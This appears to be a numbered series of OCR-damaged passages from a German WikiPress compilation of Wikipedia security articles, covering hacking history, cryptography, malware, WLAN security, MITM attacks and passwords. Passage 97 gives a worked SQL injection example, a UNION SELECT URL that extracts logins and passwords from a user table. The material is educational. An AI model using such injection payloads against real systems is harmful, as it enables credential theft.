91. er aus der KGB Gruppe ausgeschlossen wird und ein Freund ihn schlie lich zwecks Entziehungskur in eine psychiatrische Klinik bringt Die anderen Mitglieder der Gruppe hacken derweil unvermindert weiter f r Geld Durch monatelange detektivische Kleinarbeit und das Stellen von Fallen gelingt es Clifford Stoll Systemadministrator in Berkeley und anderen die Spur der Hacker nach Deutschland zur ckzuverfolgen Im Juni 1987 wird schlie lich die Wohnung von Markus Hess alias Urmel durchsucht ein Haftbefehl ergeht Da die benutzte Fangschaltung aber nicht gerichtlich genehmigt war muss das Ermittlungsverfahren sp ter eingestellt werden Eine Zeit lang geht es mit Koch bergauf Da er Mitte 1988 in Geldsorgen ist bietet er einem NDR Reporter ein Gesch ft an Gegen 10 000 DM will er vor laufender Kamera in den Rechner der Kernforschungsanlage J lich eindringen Au erdem pr sentiert er dem Reporter vertrauliche Unterla gen ber die Terror Fahndung aus einem Polizei Rechner die zwar echt sind aber nicht von ihm selbst erhackt worden sind Informationen ber diese Tatsache gelangen aus dem NDR nach drau en woraufhin eine Hausdurchsuchung im Funkhaus Hamburg stattfindet Die Verantwortli chen streiten nat rlich ab Koch Geld f r kriminelle Aktivit ten angebo ten zu haben Koch stellt sich am 5 Juli 1988 dem Verfassungsschutz und sagt in monatelangen Verh ren umfassend ber seine Aktivit ten nicht nur in Sachen KGB aus Am 1
92. erh ngt aufgefunden wurde Manche Mitglieder des CCC vertreten ve hement eine Mordtheorie Die Umst nde des Falls konnten bislang nicht aufgekl rt werden 161 Sonstige Themen 2001 starb Wau Holland Gr nder und Vaterfigur des Chaos Computer Clubs Ebenfalls im Jahr 2001 feierte der Club sein 20 j hriges Bestehen mit einer interaktiven Lichtinstallation namens Blinkenlights am Haus des Lehrers am Alexanderplatz in Berlin Bekannte CCC Mitglieder sind u a der Gr nder Wau Holland Steffen Wernery Andy M ller Maguhn der von 2000 bis 2002 einen Sitz im Di rektorat der ICANN hatte und der Autor Peter Glaser Kurz vor seinem Tod 1995 wurde Konrad Zuse zum Ehrenmitglied des CCC ernannt H ufig arbeitet der CCC auch mit anderen Organisationen die sich gegen Zensur f r Informationsfreiheit oder den Datenschutz einsetzen zusammen Insbesondere sind hier der FITUG und der FoeBuD zu nen nen Am 26 Juli 2004 machte der Club wieder auf sich aufmerksam Der freie IT Unternehmer Dirk Heringhaus ver ffentlichte im clubeigenen Magazin Datenschleuder sowie in der Presse seine Aufzeichnungen ber ein mehr als einj hriges Hin und Her mit der Deutschen Telekom um Sicherheitsl cher in ihrem Auftragsabwicklungssystem OBSOC um die sich der Rosa Riese lange Zeit nicht k mmerte Heringhaus bezeichnet diese Aktion als T Hack was strenggenommen nicht ganz richtig ist da es sich nicht um einen Hack im eigentlichen Sinne handelt sondern
93. f r Entschl sselungen unter scheiden Die technische Anwendung von standardisierten bekannten Kodie rungsverfahren Es liegt lediglich eine unbekannte Kodierung oder Sprache vor der Ur heber hat aber gar keine Information verbergen wollen Eine Weitergabe Nutzung oder Ver nderung von Daten die vom Ur heber unterbunden werden wollte Offenlegung der Information oder Botschaft von anderen Personen als den vom Urheber erw nschten Adressaten In den meisten Anwendungen der Informatik steht nicht die Entschl sse lung unbekannter Kodierungen im Vordergrund sondern es werden Ver und Entschl sselung f r technische Funktionen wie zur Datenkompressi on oder zur Umwandlung verschiedener Zeichens tze verwendet 285 Kryptografie Entschl sselung und Urheberrecht Aktuelle Bedeutung erlangt hat die Entschl sselung im Kontext der Um gehung von Kopierschutz oder anderen Mechanismen die von Firmen zum Schutz des Urheberrechtes an Multimediainhalten zum Beispiel von CDs Filmen Computerspielen und Pay TV eingerichtet werden Hierzu werden insbesondere kryptologische Verfahren verwendet Im 95a Abs 2 HS 1 des novellierten deutschen Urheberrechts ist die Nutzung so genannter Umgehungsvorrichtungen verboten worden genauer eine Umgehung von technischen Ma nahmen die im normalen Betrieb dazu bestimmt sind gesch tzte Werke betreffende Handlungen die vom Rechtsinhaber nicht genehmigt sind zu verhindern od
94. gute Gesch ft mit unseren Daten Miinchen 2005 ISBN 3 446 22980 9 Weblinks Bundesbeauftragter fiir den Datenschutz gt http www bfd bund de 19 berblick sterreichische Datenschutzkommission http www dsk gv at Schweizerischer Datenschutzbeauftragter http www edsb ch Europ ischer Datenschutzbeauftragter http www edps eu int Quelle http de wikipedia org wiki Datenschutz Historie 25 4 03 angelegt von Hagbard danach bearbeitet von den Hauptautoren Forevermore Mwka C L ser Hagbard The pulse Gandi WernerH Fgb Badenserbub MichaelDiederich Learny Cyper Christoph B PatrickD Stf Micha99 Diddi Purodha AlexR Andrsvoss Pelle6 Achim Raschka Steven Malkovich 3systems B N Gr mpfm Hutch Wiener Tonk Zwobot Devanitator Hostelli Este Nerd Gregor Bert Diago Bib anonym 12 1 06 1 2 06 WikiPress Redaktion Datensicherheit Datensicherheit hat das Ziel Daten jeglicher Art in ausreichendem Mafe vor Verlust Manipulationen unberechtigter Kenntnisnahme durch Drit te und anderen Bedrohungen zu schiitzen Dabei unterscheidet man in der Regel die Schutzziele Vertraulichkeit Verf gbarkeit Integrit t und Ver bindlichkeit Anforderungen zu Datensicherheit von personenbezogenen Daten ergeben sich aus dem gesetzlichen Datenschutz der in Deutsch land im BDSG geregelt ist Datensicherheit umfasst aber auch andere Da ten z B Vertragsdaten Bilanzdaten oder Forschungsergebnisse
95. hrend ein Hoax meist nur erschrecken m chte eignet sich so ge nanntes Phishing zum Betrug indem es den Empf nger der E Mail auf fordert Anmeldedaten beispielsweise f r das Onlinebanking per E Mail oder ber eine gef lschte Webseite bekannt zu machen Quelle http de wikipedia org wiki Hoax Historie 25 1 03 Angelegt von OderWat danach bearbeitet von den Hauptautoren OderWat Suricata Nerd Siehe auch L scher Kurt Jansson Robot Cyvh Fischchen Temistokles VanGore Zaphiro Chd Anton Immanuel Giel Marilyn hanson Ste ba Steven Malkovich Sven423 Splattne Hoch auf einem Baum Zwobot Angela MoriBot AndreasPraefcke anonym 12 1 06 1 2 06 WikiPress Redaktion Skriptkiddie Skriptkiddie ist die Sammelbezeichnung f r die Verursacher netzbasier ter Aktionen des nicht zielgerichteten Vandalismus Als englisch neu deutscher Ausdruck existieren eine Vielzahl alternativer Schreibformen Skriptkiddies sind Teil der Leetspeak Subkultur Der Begriff ist von Skript und kiddy englisch f r Kind abgeleitet und verdeutlicht dass ein Skriptkiddie ein kindhaftes Verhalten aufweist und fremde Skripte bzw Programme benutzt also selbst keine heraus ragenden Programmierf higkeiten besitzt Der Begriff wird daher immer in negativem Zusammenhang gebraucht Skriptkiddies halten sich selbst f r Hacker oder Cracker Von diesen unterscheiden sie sich aber durch den ausschlie lichen Gebrauch vorgefertigter Programme z
96. ist Jeder Nutzer des Netzes kann den gesam ten Verkehr zudem mitlesen Die Kombination von RC4 und CRC wird als mathematisch unsicher betrachtet Aus diesen Gr nden haben sich technische Erg nzungen entwickelt etwa WEPplus Wi Fi Protected Access WPA als Vorgriff und Teil menge zu 802 11i Fast Packet Keying Extensible Authentication Protocol EAP Kerberos oder High Security Solution die alle mehr oder weniger gut das Sicherheitsproblem von WLAN verkleinern Der Nachfolger des WEP ist der neue Sicherheitsstandard 802 11i Er bietet eine erh hte Sicherheit durch die Verwendung von TKIP bei WPA bzw Advanced Encryption Standard AES bei WPA2 und gilt zur Zeit als nicht zu entschliisseln solange man bei der Einrichtung keine trivialen Passw rter verwendet die ber eine W rterbuch Attacke geknackt wer 240 Wireless LAN den k nnen Als Empfehlung kann gelten mit einem Passwortgenerator Passw rter zu erzeugen die Buchstaben in Gro und Kleinschreibung Zahlen und Sonderzeichen enthalten und nicht k rzer als 32 Zeichen sind WPA2 ist das quivalent der Wi Fi zu 802 11i das mit dem Verschl s selungsalgorithmus AES Advanced Encryption Standard mit Schl ssel l ngen von 256 Bit arbeitet und in neueren Ger ten meist unterst tzt wird Ein genaues Betrachten der technischen Daten um herauszufinden ob WPA2 auch tats chlich unterst tzt wird empfiehlt sich allerdings vor dem Kauf Einige Ger te lassen sich durch
97. ist die UNION Klausel verf gbar Diese erlaubt es mehrere SELECTs gleichzei tig abzusetzen die dann eine gemeinsame Ergebnismenge zur ckliefern Durch eine geschickt untergeschobene UNION Klausel kann man belie bige Tabellen und Systemvariablen auslesen Erwarteter Aufruf Aufruf http webserver cgi bin find cgi ID 42 Erzeugtes SQL SELECT author subjekt text FROM artikel WHERE artikel ID 42 SQL Injektion Aufruf http webserver cgi bin finduser cgi ID 42 UNION SELECT login password x FROM user Erzeugtes SQL SELECT author subjekt text FROM artikel WHERE ID 42 UNION SELECT login password x FROM user Das x beim UNION SELECT ist n tig weil alle mit UNION verkniipf ten SELECTs die gleiche Anzahl von Spalten haben m ssen Der An greifer muss also wissen wie viele Spalten die urspr ngliche Abfrage hat Ist der Datenbankserver fehlerhaft konfiguriert und hat beispielswei se der Benutzer der aktuell mit der Datenbank verbunden ist und ber 217 Angriffe den die SQL Injection abgesetzt werden soll Zugriff auf Systemdatenban ken so kann der Angreifer ber eine einfache SQL Syntax wie System datenbank SystemtabelleMitTabellenAuflistung auf die Systemtabellen zugreifen und s mtliche Tabellen einer bestimmten Datenbank auslesen wodurch er wichtige Informationen erh lt um weitere Angriffe durchzu f hren und tiefer in das System einzudringen Einschleusen von beliebigem Code Eine weniger bekannt
98. mail com GRAMMERSoft Group Manila Philippines Diese beiden Kommentarzeilen st tzen die Aussagen des Autors Onel de Guzman dass der Wurm versehentlich freigesetzt wurde Der Informa tik Student Guzman hatte im Vorfeld vergeblich versucht eine Hausarbeit oder seine Diplomarbeit mit dem Thema E Mail Password Sender Tro jan einzureichen die Loveletter sehr hnlich ist 62 Loveletter Verbreitungsstrategien Neben dem Neugier erweckenden Betreff versuchte I love you gezielt die Empf nger in falscher Sicherheit zu wiegen er verschickte sich an Eintr ge aus dem pers nlichen Adressbuch so dass die Empfehlung ff nen Sie keine Mailanh nge von fremden Personen nicht griff Au erdem hie der Anhang LOVE LETTER FOR YOU TXT vbs so dass sich vie le Empf nger an txt Dateien sind harmlos erinnerten da die richtige Erweiterung vbs in einer Standard Windowsinstallation nicht angezeigt wird W hrend Loveletter mit beliebigen E Mail Programmen empfangen und ausgef hrt werden kann braucht er zum Versenden von E Mails Mi crosoft Outlook das er ber OLE Automatisierung fernsteuert Dadurch konnte er auch von Personal Firewalls lange Zeit nicht erkannt werden weil diese nur die Kommunikation von Outlook mit dem Mailserver re gistrierten Des Weiteren ersetzter aufder Festplatte desbefallenen Rechners und in der Microsoft Netzwerkumgebung Dateien mit bestimmten Typen durch eine Kopie von sich selbst Wenn
99. massenhaft versendet wird meist auf Anbieter mit entsprechend vielen Kunden gezielt oder dort wo der Betr ger einen Zusammenhang zwi schen Adressen und Anbieter herstellen kann z B beim Mail Provider W rmer und Viren Der Verbreiter hat verschuldet dass sich diese von seinem Rechner aus weiterverbreiten Er hat nicht die allgemein bekannten Schutzma nahmen ergriffen damit Datei Anh nge in den E Mails die er empf ngt nicht vollautomatisch ausgef hrt werden oder er hat absichtlich auf so ein Attachment geklickt ohne mit dem vermeintlichen Absender etwas Derartiges vereinbart zu haben Bel stigungsmails ohne n here Information an diejenigen deren E Mail Adresse als Absender von Wurm oder Virus E Mails gef lscht war Der T ter hat eine defekte Virenschutz Software in Betrieb gesetzt die vollautomatisch diesen Vandalismus begeht ohne sich Gedanken zu machen dass W rmer und Viren immer gef lschte Absender tragen und dass die Opfer mit solchen Mitteilungen nichts anfangen k nnen wenn eine Kopie der zur ckgewiesenen E Mail mit allen Headern fehlt die eine Recherche der Herkunft erlauben w rde Newsletter und Mailinglisten bei denen man von unbekannten Drit ten als Abonnent eingetragen wurde und denen der n tige Schutzme chanismus fehlt um solche gef lschten Bestellungen zu erkennen Joe Jobs UBEs die so aussehen als k men sie von einer anderen Per son als dem T ter Zum Beispiel hat der T ter den Namen und oder di
100. mindestens die H lfte des Schl sselraums probiert werden muss bevor der Schl ssel gefunden wird Diese Methode ist auch bei modernen Verschl sselungsverfahren sinn 292 W rterbuchangriff voll wenn von der Verwendung eines relativ schwachen Passwortes aus gegangen werden kann Man spricht dann von einer W rterbuchattacke da gewisse Wortlisten die W rterb cher genutzt werden Ein Angriff auf das Verschl sselungsverfahren selbst ist bei modernen Algorithmen unter Verwendung eines entsprechend komplexen Schl s sels in der Praxis aussichtslos Es w rde selbst unter Einsatz von mehreren Millionen Hochleistungscomputern Jahrtausende dauern um nur einen nennenswerten Bruchteil des m glichen Schl sselraumes durchzuprobie ren Daher gilt eine Brute Force Attacke in der Praxis immer dem konkre ten Passwort Diese allerdings ist auch in der Praxis sehr h ufig erfolgreich da die meisten Benutzer kurze Passw rter verwenden Schon auf einem handels blichen Computer k nnen mehrere hundertausend Passworte pro Sekunde ausprobiert werden Bei einem W rterbuchangriff k nnen s mtliche denkbaren W rter dutzender Sprachen innerhalb weniger Se kunden berpr ft werden Ein einzelnes Wort ist daher sehr unsicher Quelle http de wikipedia org wiki Brute Force Methode Historie 31 1 04 Angelegt von Fcc go danach bearbeitet von den Hauptautoren HenrikHolke Fcc go Blubbalutsch Felix Jongleur SirJective Pinoccio Billsux Gmoel
101. mit enormem Rechenaufwand umkehrbar sind Es kann also nicht ausgeschlossen werden dass noch unbekannte Algorithmen existieren die die Umkehrung der Einwegfunktion mit vertretbarem Aufwand leisten In den Artikeln zu den einzelnen Verfah ren ist dies f r das jeweilig verwendete mathematische Problem genauer beschrieben Es gibt immer noch das Verteilungsproblem mit dem so genannten Mit telsmann oder Man In The Middle Angriff Dabei entsteht die Frage Ist der ffentliche Schl ssel tats chlich echt Ein Mittelsmann t uscht den ffentlichen Schl ssel eines Kommunikationspartners vor entschl sselt die Nachricht mit seinem privaten Schl ssel verschl sselt die Nachricht mit dem eigentlichen ffentlichen Schl ssel und sendet sie weiter Dieses Problem wird mit Hilfe von vertrauensw rdigen Zertifizierungsstellen angegangen Weitere Informationen Zu den asymmetrischen Verschl sselungsalgorithmen z hlen RSA die Rabin und die Elgamal Kryptosysteme In den letzten Jahren wurde die Verschl sselung mit Elliptischen Kurven immer popul rer da sie mit we sentlich kleineren Schl sseln auskommt Literatur Beutelspacher Albrecht Schwenk J rg Wolfenstetter Klaus Dieter Moderne Verfahren der Kryptographie Von RSA zu Zero Knowledge 4 Auflage Vieweg Verlag 2001 ISBN 3 528 36590 0 Ertel Wolfgang Angewandte Kryptographie Hanser Fachbuchverlag M nchen Wien 2003 ISBN 3 446 22304 5 280 Verschl sselung Paine
102. nicht bei 100 liegt Unbekannte Viren k n nen von den meisten dieser Programme anhand ihres Verhaltens entdeckt werden Heuristik diese Funktionen arbeiten jedoch sehr unzuverl ssig Auch entdecken Antivirenprogramme Viren oft erst nach der Infektion und k nnen das Virus unter Umst nden nicht im normalen Betrieb entfernen Besteht der berechtigte Verdacht einer Infektion sollten nacheinander mehrere On Demand Programme eingesetzt werden Dabei ist es sinn voll darauf zu achten dass die Programme unterschiedliche Engines nutzen damit die Erkennungsrate steigt Es gibt Antivirenprogramme verschiedener Hersteller die die gleiche Scan Methoden anwenden also im Grunde eine hnlich hohe Erkennungswahrscheinlichkeit haben und damit auch ein hnliches Risiko bestimmte Viren zu bersehen Ver schiedene On Access Antivirenprogramme W chter Guard Shield etc sollten nie gleichzeitig installiert sein weil das zu Fehlfunktionen des PC f hren kann Da viele dieser On Access Scanner bereits beim Hochfah ren des Betriebssystems nach Bootsektorviren suchen werden sie quasi gleichzeitig gestartet und versuchen einen alleinigen und ersten Zugriff auf jede zu lesende Datei zu erlangen was naturgem unm glich ist und daher zu schweren Systemst rungen f hren kann bzw muss Werden mehrere On Demand Scanner installiert und auch unab h ngig also nicht gleichzeitig gestartet und ausgef hrt sind falsche Vi renfunde h ufig bei den
103. oder an der Software vor Schad funktion Derzeit 2005 sind noch keine echten Handyviren bekannt Umgangssprachlich wird der Begriff Handyvirus auch f r Handyw rmer Trojanische Pferde und Fehlfunktionen von Handys benutzt Ein Beispiel f r einen Softwarefehler im Betriebssystem des Mobilte lefons welcher gerne als Virus bezeichnet wird ist Deutsch mit Anf hrungszeichen den man per Short Message Service SMS verschi cken kann Er wirkt nur bei lteren Siemens Modellen und hat zur Folge dass das Handy die Kurzmitteilung SMS so lange l dt bis der Akku leer ist oder bis man ihn herausnimmt Dieser Bug wird auch Siemens Freeze Bug genannt 48 CIH Virus F lschlicherweise als Virus bezeichnet werden oft die Symbole f r einge gangene Sprachmitteilungen Faxnachrichten und E Mails welche man per SMS aktivieren und auch wieder deaktivieren kann Die gesendeten Symbole werden auch bei den meisten Telefonen wieder deaktiviert wenn das Handy mit einer anderen SIM Karte einmal eingeschaltet wird Der angeblich erste Wurm f r Symbian Mobiltelefone namens Cabir hat es sogar in die Virendefinitionen der Antivirenprogramm Hersteller geschafft Der Wurm verbreitet sich via Bluetooth und wird von jedem infizierten Ger t an andere Bluetooth Mobiltelefone der Series 60 Platt form weitergeleitet Das Programm geht dabei als caribe sis im Postein gang des Handys ein und muss durch den Benutzer am Handy manuell installie
104. puternetzen ihre Anwendung findet Auch die Bezeichnung Mittelsmann angriff wird gelegentlich verwendet Bei dieser Bezeichnung handelt es sich jedoch um einen falschen Freund Der Angreifer steht dabei entweder physisch oder heute meist lo gisch zwischen den beiden Kommunikationspartnern und hat dabei mit seinem System komplette Kontrolle ber den Datenverkehr zwischen zwei oder mehreren Netzwerkteilnehmern und kann die Informationen nach Belieben einsehen und sogar manipulieren Diese Sonderstellung kann auf verschiedene Arten erreicht werden Der Angreifer hat Kontrolle ber einen Router durch den der Daten verkehr geschleust wird Dies funktioniert sowohl im Internet als auch im LAN Im Ethernet modifiziert der Angreifer die ARP Tabellen der Opfersys teme und leitet dadurch den gesamten Datenverkehr durch sein System hindurch Diese Methode funktioniert nur im LAN erm glicht aber auch das Abh ren des Datenverkehrs an Switches ARP Spoofing Diese Methode funktioniert immer dann wenn der Angreifer und das Opfer im gleichen lokalen Netz sind Dies ist auch bei Kabelnetzanbie tern und z B bei ffentlichen WLAN Hotspots gegeben Der Angreifer h ngt am selben Netzwerkbus wie das Opfer wodurch sowieso alle Pakete bei ihm ankommen Dies funktioniert allerdings nur noch bei Netzwerken mit Busstruktur wie z B Ethernet mit Hub oder Cheapernet Eine weitere Angriffsmethode die ebenfalls ein gemeinsames loka les N
105. r keine Kollision 1 1 26 4 das sind etwa 39 Das hei t bei 27 untersuchten La gen erwartet man theoretisch f r 27 1 1 26 der F lle keine Kollisionen Der Ausdruck ergibt etwa den Wert 10 5 und stimmt sehr gut mit den im Beispiel beobachteten zehn kollisionsfreien Crib Lagen berein Mit Hilfe dieser u erst simplen kryptanalytischen Angriffsmethode lassen sich so von den 27 m glichen Lagen des Wahrscheinlichen Worts hier siebzehn also mehr als die H lfte als unm glich eliminieren eine erhebliche Arbeitsvereinfachung f r den Angreifer siehe Beispiel auf der folgenden Seite Entzifferung Die Betreiber der Schl sselmaschine Enigma waren der Meinung dass die durch sie maschinell verschl sselten Texte im Gegensatz zu fast allem was bis 1918 gebr uchlich war mit manuellen Methoden nicht zu knacken sind Und damit hatten sie Recht Was bersehen wurde ist dass einer maschinellen Verschl sselung durch maschinelle Entzifferung begegnet werden kann 307 Kryptografie Beispiel Ein Fragment des Geheimtextes wird mit einem im Text ver muteten Wort verglichen FMHVPFUIDPJOUCXRWGYFZBECTIDFXZOSIVIEGVCEDBZDTJCOXH 1 OBERKOMMANDODERWEHRMACHT 2 OBERKOMMANDODERWEHRMACHT 3 OBERKOMMANDODERWEHRMACHT 4 OBERKOMMANDODERWEHRMACHT 5 OBERKOMMANDODERWEHR 6 OBERKOMMANDODERWEH 7 OB OMMANDODERWE 8 OB OMMANDODERWE 9 OB OMMANDODERWE 10 OBERKOMMANDODERWE 110 OMMANDODERWEHRM KOMMANDODERWEHR MMANDODERWEH 14 OBERKOMMANDODERWE KOMM
106. replace the old one on explicit permission from the previous publisher that added the old one The author s and publisher s of the Document do not by this License give permission to use their names for publicity for or to assert or imply endorsement of any Modified Version 5 COMBINING DOCUMENTS You may combine the Document with other documents released under this License under the terms defined in section 4 above for modified versions provided that you include in the combination all of the Invariant Sections of all of the original documents unmodified and list them all as Invariant Sections of your combined work in its license notice and that you preserve all their Warranty Disclaimers The combined work need only contain one copy of this License and multiple identical Invariant Sections may be replaced with a single copy If there are multiple Invariant Sections with the same name but different contents make the title of each such section unique by adding at the end of it in parentheses the name of the original author or publisher of that section if known or else a unique number Make the same adjustment to the section titles in the list of Invariant Sections in the license notice of the combined work In the combination you must combine any sections Entitled History in the various original documents forming one section Entitled History likewise combine any sections Entitled Acknowledgements and any sections Entitled Dedica
107. schrumpft die Zeit von 30 Stunden auf 30 Minuten eine durchaus ertr gliche Zeit Eine Gruppe polnischer Mathematiker um Marian Rejewski erzielte schon vor dem Zweiten Weltkrieg gro e Erfolge bei der Entzifferung von Texten die mit der Enigma chiffriert waren Die vor 1939 gebauten Versio nen waren etwas einfacher konzipiert Rejewski verwendete insbesondere S tze der Permutationstheorie f r seine Kryptoanalysen au erdem nutz te er Verfahren die linguistische Eigenheiten des Deutschen ausnutzten sowie weitere Abweichungen von reinen Zufallszeichenfolgen die durch den Einfluss des Menschen verursacht werden etwa die Bevorzugung von Spruchschl sseln wie AAA BBB ABC usw so genannte cillies m gli cherweise abgeleitet vom englischen silly f r dumm bl d Die Tatsache dass die Deutschen am Beginn einer jeden Nachricht ei nen so genannten Nachrichtenschl ssel auch Spruchschl ssel mit dem Tagesschl ssel verschl sselt sendeten machte sich Rejewski zu Nutze um den Suchraum des Codierungsschl ssels drastisch einzuschr nken Der Nachrichtenschl ssel bestand aus einer Kombination von drei Buchstaben die Anfangsstellung der drei Walzen die zur Vermeidung von Aufnah me und bertragungsfehlern zweimal hintereinander am Beginn jeder Nachricht gesendet wurde Der Empf nger entschl sselte zun chst die ersten sechs Zeichen der eingetroffenen Nachricht mit dem jeweils f r diesen Tag g ltigen Tages schl ssel
108. sich tats chlich um den Schl ssel des Absenders handelt und nicht um eine F lschung eines Be tr gers Hierzu kann der zu verschickende Schl ssel selbst wieder mit ei nem vertrauensw rdigen Schl ssel signiert sein Auf diese Weise l sst sich eine Hierarchie aus vertrauensw rdigen Institutionen aufbauen Auf die Echtheit der Schl ssel der obersten Institutionen dieser Hierarchie muss man sich aber verlassen k nnen Sie sind oft in die verarbeitende Compu ter Software integriert Wesentliche Bestandteile einer minimalen PKI sind Digitale Zertifikate Digital signierte elektronische Daten die sich zum Nachweis der Echtheit von Objekten verwenden lassen Certification Authority Organisation welche das CA Zertifikat be reitstellt und die Signatur von Zertifikatsantr gen bernimmt 140 Public Key Infrastruktur Registration Authority Organisation bei der Personen Maschinen oder auch untergeordnete Certification Authorities Zertifikate bean tragen k nnen Diese pr ft die Richtigkeit der Daten im gew nschten Zertifikat und genehmigt den Zertifikatsantrag der dann durch die Certificate Authority signiert wird Certificate Revocation Lists Listen mit zur ckgezogenen abgelaufe nen und f r ung ltig erkl rten Zertifikaten Sperrliste Verzeichnisdienst Ein durchsuchbares Verzeichnis welches ausge stellte Zertifikate enth lt meist ein LDAP Server seltener ein X 500 Server Validierungsdienst Ein Dienst der die
109. sicher sein z B durch Verwendung von verschl sselten Kan len zur bertragung Dadurch wird es bei sicherer Implementierung und ausreichender St rke der Verschl sselung f r den Angreifer nahezu unm glich das Kennwort in Erfahrung zu bringen da die Rechenka pazit t heutiger Rechner bei weitem nicht ausreicht um SSL Verschl s selungen zu knacken Viele Kennw rter k nnen von Angreifern leicht erraten werden Da die meisten Kennw rter von menschlichen Benutzern eingegeben werden im Gegensatz zur Erzeugung durch Zufallsgeneratoren und vor al lem leicht einpr gsam sein m ssen kommen h ufig einfach zu ratende Kennw rter zum Einsatz wie z B Name der Frau des Freundes oder Haustieres sowie Geburtstage oder Adressen Bei Erzeugung durch Zufallsgeneratoren ist zu beachten dass Compu ter keinen echten Zufall mit maximaler Entropie generieren k nnen Man spricht von Pseudo Zufallsgeneratoren Diese Schwachstelle kann jedoch nur in den seltensten F llen ausgenutzt werden da zuerst das Muster mit dem der Generator arbeitet also Parameter und auch die Saat das sind weitere zuf llige Parameter erschlossen werden m s sen Echten Zufall kann man z B mit berlagerung von Schallwellen gewinnen wenn man diese aufzeichnet und in digitale Form bringt 288 Kennwort Die Aufbewahrung des Kennwortes auf der Seite des Authentisierers sollte auch verschl sselt erfolgen die Kontrolle kann dank kryptogra phischer Verfah
110. ssel dechiffriert wer den Eine Kryptoanalyse solcher Verfahren ist wenn der Schl ssel entspre chend komplex ist selbst f r Strafverfolgungsbeh rden oder Geheimdienste aussichtslos Das gilt allerdings nur unter der Annahme dass diese Instituti onen nicht insgeheim die zugrundeliegenden mathematischen Probleme im Falle von RSA die effiziente Faktorisierung gro er Zahlen gel st haben Viele Regierungen darunter Irak Myanmar die Volksrepublik Chi na USA und Frankreich wollen Verschl sselung verbieten oder ineffek tiv machen Sie bef rchten Kriminelle oder Regierungskritiker k nnten 271 Kryptografie auf diese Weise kommunizieren ohne dass dies von ihnen kontrolliert werden kann Gegner dieser Ma nahmen kritisieren jedoch die damit einhergehende Einschr nkung des Grundrechts auf Vertraulichkeit des Wortes da es mit Hilfe technischer Ma nahmen f r einen Staat heute m glich ist die gesamte elektronische Kommunikation der Bev lkerung zu berwachen Im Volksmund kann etwas kryptisch sein wenn es unleserlich schwer verst ndlich oder sinnlos erscheint Quelle http de wikipedia org wiki Kryptologie Historie 3 5 02 Angelegt von Ben Zin danach bearbeitet von den Hauptautoren Ben Zin Zook Felix Jongleur Kurt Jansson Kku Maynard Steven Malkovich Nikai Achim Raschka anonym 12 1 06 1 2 06 WikiPress Redaktion Kryptoanalyse Die Kryptoanalyse bzw Kryptanalyse bezeichnet die Studie von Metho de
111. stark und k nnen in der Praxis selbst mit gr tem Aufwand nicht geknackt werden Der Schwach punkt ist in der Regel das vom Benutzer verwendete Passwort Dieses kann h ufig mit einem W rterbuchangriff gefunden werden Damit ein Passwort nicht unsicherer ist als die eigentliche Verschl sselung hier ein 128 Bit Schl ssel angenommen muss dieses aus mindestens sieben zu f lligen W rtern bestehen Weil es sich dabei nicht mehr um ein einzelnes Wort handelt spricht man auch von einer Passphrase oder einem Mantra 287 Kryptografie Ein relativ gutes Mantra w re zum Beispiel Der Baum ist rot und wir sind alle voll Plastik Es ist verh ltnism ig leicht zu merken ergibt keinen wirklichen Sinn l sst keine R ckschl sse auf den Benutzer zu Achtung Filmzitiate oder ber hmte Ausspr che sind ebenso ungeeignet wie das Geburtsdatum der Gro mutter oder der Name des Haustiers Sicherheitsfaktoren Die Sicherheit eines Kennwortes h ngt vor allem davon ab dass die ses geheim bleibt Andere Faktoren zum Schutz des Kennwortes sind z B Wie h ufig kann das Kennwort zur Authentifizierung verwendet wer den Die gr te Sicherheit ist bei einmaliger Verwendung gegeben Jeder wiederholte Einsatz des Kennwortes erh ht die Gefahr bei un verschl sseltem Transfer oder Spionage Ma nahmen wie z B durch Keylogging oder Phishing das Kennwort zu verraten Die bertragung des Kennwortes vom Benutzer zum System sollte
112. sungsm glichkeiten Die L sung f r dieses Problem besteht darin die Echtheit eines ffentli chen Schl ssels von einer vertrauensw rdigen Instanz durch ein digitales Zertifikat best tigen zu lassen Bei Public Key Infrastrukturen ist dies eine CA im Web of Trust bernehmen alle Teilnehmer diese Funktion Beispiel Schl sselaustausch im Web of Trust In einem Web of Trust funktioniert das so Alice erzeugt f r sich ein Schl sselpaar und signiert es Au erdem schickt sie den ffentlichen Teil an einen Schl sselserver key server damit andere Teilnehmer leichten Zugriff darauf haben Bob m chte mit Alice verschl sselt kommunizieren Dazu besorgt er sich Alices Schl ssel von einem Keyserver muss aber noch sicherstel len dass er wirklich den richtigen Schl ssel bekommen hat Ein An greifer k nnte sich f r Alice ausgeben und einen von ihm erzeugten Schl ssel an den Keyserver schicken Jeder der meint eine Nachricht nur f r Alice zu verschl sseln w rde sie in Wirklichkeit f r den An greifer verschl sseln 137 PGP und Zertfikate Bob fragt Alice ber einen sicheren Kanal z B einen Telefonanruf oder bei einem pers nlichen Treffen nach den Details ihres ffentlichen Schl ssels Dies sind die ID die L nge und der Typ das Erzeugungsda tum und insbesondere der Fingerprint des ffentlichen Schl ssels All diese Daten vergleicht er mit denen des Schl ssels den er vom Keyser ver erhalten hat Stimmen a
113. tzen Microsoft Windows 2000 mit Patch Windows XP Windows CE Pocket PC Windows 2003 und alle kommenden Betriebssysteme von Microsoft Mac OS Mac OS X Panther Mac OS X gt 10 3 Bei anderen Betriebssystemen sollte eine Third Party Software installiert werdem um die Funktion nutzen zu k nnen Des Weiteren ist es m glich Netzwerkkomponenten zu verwenden die eine webbasierte Authentifi zierung gestatten Quelle http de wikipedia org wiki IEEE_802 1x Historie 26 10 04 Angelegt von Headbert danach bearbeitet von den Hauptautoren Marco Bockelbrink Headbert BassD Diesterne Mps Hhdw Sparti Tsor anonym 12 1 06 1 2 06 WikiPress Redaktion 254 Aircrack Port Based Network Access Control Seit 2001 gibt es den Standard IEEE 802 1x der Port Based Network Ac cess Control bei WLANs nachr stet Die Authentifizierung der Benut zer erfolgt dabei ber das Extensible Authentication Protocol EAP Zwischen Client und Basisstation werden ber EAP die Authentifizie rungsdaten ausgetauscht Die berpr fung der Daten erfolgt aber nicht durch die Basisstation sondern durch einen RADIUS Server im Hinter grund Quelle http de wikipedia org wiki Port_Based_Network_Access_Control Historie 23 5 04 Angelegt von CSonic danach bearbeitet von den Hauptautoren CSonic Mps 12 1 06 1 2 06 WikiPress Redaktion Aircrack Aircrack ist eine Sammlung von Computerprogrammen die es erm gl
